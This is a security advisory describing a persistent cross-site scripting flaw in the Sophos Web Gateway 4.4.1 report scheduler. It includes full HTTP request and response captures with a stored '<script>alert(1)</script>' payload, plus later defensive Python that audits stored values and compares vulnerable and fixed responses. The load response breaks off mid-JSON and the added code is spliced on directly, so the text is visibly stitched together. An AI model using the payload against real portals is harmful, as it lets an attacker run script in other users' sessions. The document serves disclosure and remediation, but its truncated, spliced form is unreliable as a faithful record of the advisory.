KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability

Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
Advisory ID: KL-001-2018-001
Publication Date: 2018.01.26
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt

1. Vulnerability Details

     Affected Vendor: Sophos
     Affected Product: Web Gateway
     Affected Version: 4.4.1
     Platform: Embedded Linux
     CWE Classification: CWE-79: Improper Neutralization of Input During Web Page Generation,
                         CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page
     Impact: Arbitrary Code Execution
     Attack vector: HTTP

2. Vulnerability Description

     The report scheduler menu within the management portal contains a persistent cross site scripting vulnerability. This vulnerability can be used to target other users of the same portal.

3. Technical Description

     A valid session is required to create the report with the persistent cross site scripting payload attached. An example attack payload is included below. This payload is designed to trigger an alert box displaying the number one.
     POST /index.php?c=report_scheduler HTTP/1.1
     Host: 1.3.3.7
     Accept-Language: en-US,en;q=0.5
     X-Requested-With: XMLHttpRequest
     X-Prototype-Version: 1.6.1
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Content-Length: 1190
     DNT: 1
     Connection: close

     action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d

     HTTP/1.1 200 OK
     Date: Sat, 29 Jul 2017 16:05:25 GMT
     Server: Apache
     Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
     Pragma: no-cache
     X-Frame-Options: sameorigin
     X-Content-Type-Options: nosniff
     Connection: close
     Content-Type: text/html; charset=utf-8
     Content-Length: 41

     {"status":0,"statusMsg":"Settings saved"}

     The URL-encoded value passed in the data parameter decodes to an array containing a single JSON buffer.
     [{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1", "sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday", "txt_schedule_name": "test<script>alert(1);</script>", "cb_activate_schedule": "yes", "recipients": "test@test.asdasd", "schedule_id": "dGVzdA==", "owner": "admin"}]

     Within the JSON buffer is a key called txt_schedule_name. The value for this key is the name of the scheduled report, and it is included in the report schedule list.

     "txt_schedule_name": "test<script>alert(1);</script>"

     The HTML tags are stored as-is. When the report schedule list is loaded, the resulting JSON is sent with Content-Type text/html instead of application/json, so the browser executes any unescaped JavaScript it contains. The output is HTML-encoded with the exception of the txt_schedule_name value, which is not sanitized, and the payload triggers.

     POST /index.php?c=report_scheduler HTTP/1.1
     Host: 1.3.3.7
     Accept: text/javascript, text/html, application/xml, text/xml, */*
     Accept-Language: en-US,en;q=0.5
     X-Requested-With: XMLHttpRequest
     X-Prototype-Version: 1.6.1
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Content-Length: 81
     DNT: 1
     Connection: close

     action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd

     HTTP/1.1 200 OK
     Date: Sat, 29 Jul 2017 16:06:38 GMT
     Server: Apache
     Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
     Pragma: no-cache
     X-Frame-Options: sameorigin
     X-Content-Type-Options: nosniff
     Connection: close
     Content-Type: text/html; charset=utf-8
     Content-Length: 1365

     {"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test
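     The two defects the advisory describes (one field left unencoded, and a JSON body served as text/html) can be made concrete in a few lines. The Python below is an added example, not the advisory's or Sophos's code: it decodes a data= submission of the shape shown above, flags stored values that carry HTML metacharacters, and contrasts a load response that mirrors the described behaviour with a hardened one. The function names and the shortened sample body are constructed for this example; the product's own server-side code is not available.

```python
"""Decode a report-scheduler 'save' submission, audit stored values for
markup, and compare the vulnerable and hardened shapes of the 'load' reply.
Example code written for this advisory; all names are illustrative."""
import html
import json
from urllib.parse import parse_qs, quote

# Constructed request body with the same shape as the advisory's 'save'
# request: action, STYLE token and a URL-encoded JSON array in 'data'.
# Field set trimmed to what the example needs.
SCHEDULE = [{
    "STYLE": "016a16896568739c11955632068abddd",
    "rd_schedule": "daily",
    "txt_schedule_name": "test<script>alert(1);</script>",
    "recipients": "test@test.asdasd",
    "owner": "admin",
}]
SAMPLE_BODY = (
    "action=save&STYLE=016a16896568739c11955632068abddd&data="
    + quote(json.dumps(SCHEDULE), safe="")
)


def decode_submission(body):
    """Return the list of schedule objects carried in the data= parameter."""
    params = parse_qs(body, keep_blank_values=True)
    return json.loads(params["data"][0])


def find_markup_fields(records):
    """Report (key, value) pairs whose string value contains HTML
    metacharacters.  Useful when auditing already-stored settings for
    injected tags after a disclosure like this one."""
    hits = []
    for record in records:
        for key, value in record.items():
            if isinstance(value, str) and any(c in value for c in "<>\"'"):
                hits.append((key, value))
    return hits


def render_vulnerable(records):
    """Mirror the behaviour the advisory describes: every value is
    HTML-encoded except txt_schedule_name, and the body goes out as
    text/html, so a browser treats the reply as a document."""
    escaped = [
        {k: (v if k == "txt_schedule_name" else html.escape(v))
         for k, v in r.items()}
        for r in records
    ]
    headers = {"Content-Type": "text/html; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    return headers, json.dumps({"schedulesJS": escaped})


def render_fixed(records):
    """Hardened reply: encode every string the same way (no field is
    special-cased) and declare the body as JSON."""
    escaped = [{k: html.escape(v, quote=True) for k, v in r.items()}
               for r in records]
    headers = {"Content-Type": "application/json; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    return headers, json.dumps({"schedulesJS": escaped})


def response_is_safe(headers, body):
    """Check a tester can run against the load reply: JSON content type,
    and no raw tag delimiters anywhere in the body."""
    content_type = headers.get("Content-Type", "").split(";")[0].strip().lower()
    return (content_type == "application/json"
            and "<" not in body and ">" not in body)


if __name__ == "__main__":
    records = decode_submission(SAMPLE_BODY)
    print("fields carrying markup:", find_markup_fields(records))
    for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        hdrs, body = render(records)
        print(label, "safe:", response_is_safe(hdrs, body))
        print("  ", hdrs["Content-Type"])
        print("  ", body)
```

     The content-type change is what stops the browser from rendering the reply as a page; the consistent encoding closes the injection regardless of how the client later inserts the name into the schedule list. X-Content-Type-Options: nosniff, already present in the captured responses, does not help here because the declared type is text/html rather than a type the browser would have to guess.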